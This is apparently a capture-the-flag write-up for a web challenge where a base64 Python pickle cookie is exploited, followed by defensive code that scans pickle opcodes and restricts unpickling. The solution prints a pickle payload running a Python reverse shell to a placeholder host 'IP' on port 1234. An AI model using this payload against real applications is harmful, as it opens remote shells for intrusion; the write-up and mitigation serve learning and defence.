# WX01

## **About The Challenge**

| Type | Difficulty |
| ---- | ---------- |
| Web  | eXtreme    |

## Solution

The last web challenge was a bit hard; it mostly depended on enumeration and research.

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7_xtt1Le0fwpgYKTt%2FScreenshot_2020-11-13_18-12-16.png?alt=media\&token=863207be-cbe6-4517-b3af-a238e77b521e)

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7c34O5gjOjWvjj-MM%2FScreenshot_2020-11-13_18-15-43.png?alt=media\&token=12b14b68-02bd-4d7b-aef7-780522e8b22a)

The home page asks for our name. After entering any name, the page shows the message `Reload for your greeting...`, nothing interesting here.

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7amtRJbWu2y96KR1h%2FScreenshot_2020-11-13_18-13-45.png?alt=media\&token=040e7934-f04b-4964-8256-ce6413730099)

Looking at the cookies, I found a cookie set by the website that is sent along with every request. Its value is `KGRwMApWbmFtZQpwMQpWdGV0cwpwMgpzLg==`, which is base64 encoded; decoding it gives:

```
(dp0
Vname
p1
Vtets
p2
s.
```

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7bve52G_-GaVL4rKb%2FScreenshot_2020-11-13_18-14-20.png?alt=media\&token=1e8231af-ce46-4b8f-845b-f2a3fc84cbbc)

After some research I found that the decoded value is serialized data from the Python `pickle` library, and unpickling untrusted data is a well-known remote code execution vulnerability.

After identifying that the application is vulnerable to RCE, I injected a reverse shell using the following pickle payload:

```
cos
system
(S'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\''
tR.
```

Then I base64 encoded it.

![](https://3440279504-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MM4TVxXO_3L3IYJHc1e%2F-MO7ZyOB1OjnDic6a4P6%2F-MO7eAJd6Vfo1INiOxpQ%2FScreenshot_2020-11-13_18-28-36.png?alt=media\&token=528e053a-3fc1-4f91-a747-c4c8d5f90c1b)

Finally, I entered my base64 encoded text into the input and got the flag.

{% hint style="info" %}
Here I had created a netcat listener on my machine in order to catch the reverse shell, but surprisingly the flag came back as output on the website itself.
{% endhint %}

**Flag is:** whaTaPiCKle-018817
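The root cause here is that the server base64-decodes the cookie and hands it straight to `pickle.loads`, so any GLOBAL/REDUCE sequence runs code. The following is an added example (not the challenge's own code) of how a defender would handle such a cookie: disassemble the stream with `pickletools.genops` without executing it, reject code-capable opcodes, and unpickle with a restricted loader that refuses all global lookups. The benign cookie value is the one from the write-up; the hostile sample is constructed here and points at the harmless `os.getcwd`.

```python
import base64
import io
import pickle
import pickletools

# Opcodes that let a pickle stream import or call arbitrary callables. A
# session cookie holding plain data (dict/str/int) never needs any of them.
DANGEROUS_OPCODES = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "BUILD",
                     "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX"}


def suspicious_opcodes(data: bytes) -> list:
    """Disassemble the stream WITHOUT executing it and list any opcode
    that could import or call code. Malformed input counts as suspicious."""
    found = []
    try:
        for opcode, _arg, _pos in pickletools.genops(data):
            if opcode.name in DANGEROUS_OPCODES:
                found.append(opcode.name)
    except ValueError:
        found.append("MALFORMED")
    return found


class RestrictedUnpickler(pickle.Unpickler):
    """Second line of defence: refuse every global lookup outright."""

    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def load_cookie(cookie: str) -> dict:
    """Decode a base64 pickle cookie safely: scan first, then unpickle with
    the restricted loader, and only accept a dict of values."""
    data = base64.b64decode(cookie)
    bad = suspicious_opcodes(data)
    if bad:
        raise ValueError(f"rejected cookie, found opcodes {bad}")
    obj = RestrictedUnpickler(io.BytesIO(data)).load()
    if not isinstance(obj, dict):
        raise ValueError("cookie did not contain a dict")
    return obj


# Cookie value from the write-up; it decodes to {'name': 'tets'}.
BENIGN_COOKIE = "KGRwMApWbmFtZQpwMQpWdGV0cwpwMgpzLg=="
# Constructed sample with the same GLOBAL -> REDUCE shape as the payload
# above, but pointing at the harmless os.getcwd so it is safe to test.
HOSTILE_PICKLE = b"cos\ngetcwd\n(tR."
HOSTILE_COOKIE = base64.b64encode(HOSTILE_PICKLE).decode()
```

The scan alone is enough to alert on a tampered cookie in logs; the restricted loader is what keeps the application safe if a new opcode sneaks past the list.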
